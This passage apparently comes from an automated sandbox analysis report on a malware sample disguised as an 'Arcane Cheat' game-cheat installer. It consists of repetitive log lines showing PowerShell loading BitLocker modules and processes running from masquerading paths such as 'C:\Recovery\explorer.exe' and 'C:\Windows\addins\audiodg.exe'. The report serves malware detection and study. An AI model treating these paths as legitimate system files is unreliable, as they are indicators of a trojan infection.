            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
